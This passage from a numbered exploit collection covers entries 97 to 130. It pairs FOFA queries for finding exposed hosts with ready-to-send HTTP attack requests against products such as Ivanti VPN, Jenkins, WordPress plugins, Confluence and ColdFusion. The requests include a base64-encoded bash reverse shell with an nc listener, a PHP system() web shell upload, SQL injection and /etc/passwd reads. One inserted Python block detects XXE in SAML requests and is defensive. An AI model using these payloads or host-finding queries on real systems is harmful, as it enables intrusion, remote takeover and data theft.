groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document content; the XML document is:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

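As an added defender-side example (not part of the original post or of any vendor tooling), the check below decodes the SAMLRequest parameter of a form body posted to saml-sso.cgi and flags any DTD or external-entity declaration, which a legitimate SAML AuthnRequest never carries. The sample bodies are constructed here, and the hostname collector.invalid is a placeholder.

```python
import base64
import binascii
import re
import zlib
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlencode

# XML keywords that only appear when a DTD is embedded in the document.
# They are case-sensitive in XML, so the match is case-sensitive as well.
_DTD_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b")


def decode_saml_request(value: str) -> Optional[str]:
    """Turn a SAMLRequest value into XML text.

    The HTTP-POST binding carries plain base64; the HTTP-Redirect binding
    carries base64 of raw-deflated XML, so inflating is tried as a fallback.
    Returns None when the value cannot be decoded at all.
    """
    try:
        raw = base64.b64decode(value.replace(" ", "+"))  # tolerate an unencoded '+'
    except (binascii.Error, ValueError):
        return None
    if not raw.lstrip().startswith(b"<"):
        try:
            raw = zlib.decompress(raw, -15)  # raw DEFLATE stream, no zlib header
        except zlib.error:
            return None
    return raw.decode("utf-8", errors="replace")


def find_dtd_markers(xml_text: str) -> List[str]:
    """Return the distinct DTD-related keywords present, in first-seen order."""
    seen: List[str] = []
    for marker in _DTD_MARKERS.findall(xml_text):
        if marker not in seen:
            seen.append(marker)
    return seen


def inspect_saml_sso_body(body: str) -> Dict[str, object]:
    """Inspect an x-www-form-urlencoded body posted to /dana-na/auth/saml-sso.cgi.

    Result keys: 'suspicious' (bool), 'markers' (keywords found) and
    'reason' (short text suitable for an alert or log line).
    """
    params = parse_qs(body, keep_blank_values=True)
    values = params.get("SAMLRequest", [])
    if not values:
        return {"suspicious": False, "markers": [], "reason": "no SAMLRequest parameter"}
    xml_text = decode_saml_request(values[0])
    if xml_text is None:
        # Nothing the normal SP/IdP flow produces; worth a look even without a DTD.
        return {"suspicious": True, "markers": [], "reason": "SAMLRequest is not decodable"}
    markers = find_dtd_markers(xml_text)
    if markers:
        return {"suspicious": True, "markers": markers,
                "reason": "DTD/external entity in SAMLRequest: " + ", ".join(markers)}
    return {"suspicious": False, "markers": [], "reason": "no DTD in SAMLRequest"}


def _raw_deflate(data: bytes) -> bytes:
    """Raw DEFLATE (no zlib header), as used by the SAML HTTP-Redirect binding."""
    comp = zlib.compressobj(wbits=-15)
    return comp.compress(data) + comp.flush()


# Constructed samples, not captured traffic. The hostname is a placeholder.
BENIGN_XML = ('<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
              'ID="_1" Version="2.0" IssueInstant="2024-01-01T00:00:00Z"/>')
XXE_XML = ('<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % ext SYSTEM '
           '"http://collector.invalid/x"> %ext;]><r></r>')

BENIGN_BODY = urlencode({"SAMLRequest": base64.b64encode(BENIGN_XML.encode()).decode()})
XXE_BODY = urlencode({"SAMLRequest": base64.b64encode(XXE_XML.encode()).decode()})
DEFLATED_BODY = urlencode({"SAMLRequest": base64.b64encode(_raw_deflate(BENIGN_XML.encode())).decode()})


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("deflated", DEFLATED_BODY), ("xxe", XXE_BODY)):
        print(label, inspect_saml_sso_body(body))
```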
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. 北京百绰智能 S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform: SQL injection via /importexport.php
CVE-2024-2771
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64-encoded SQL statement; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence: template injection leading to code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system: arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file URL: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect: authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can then be executed from there.

126. aiohttp: path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks: XXE via DataExchange.ashx
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion: deserialization
CVE-2023-38203
Affected versions: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion: arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system: arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
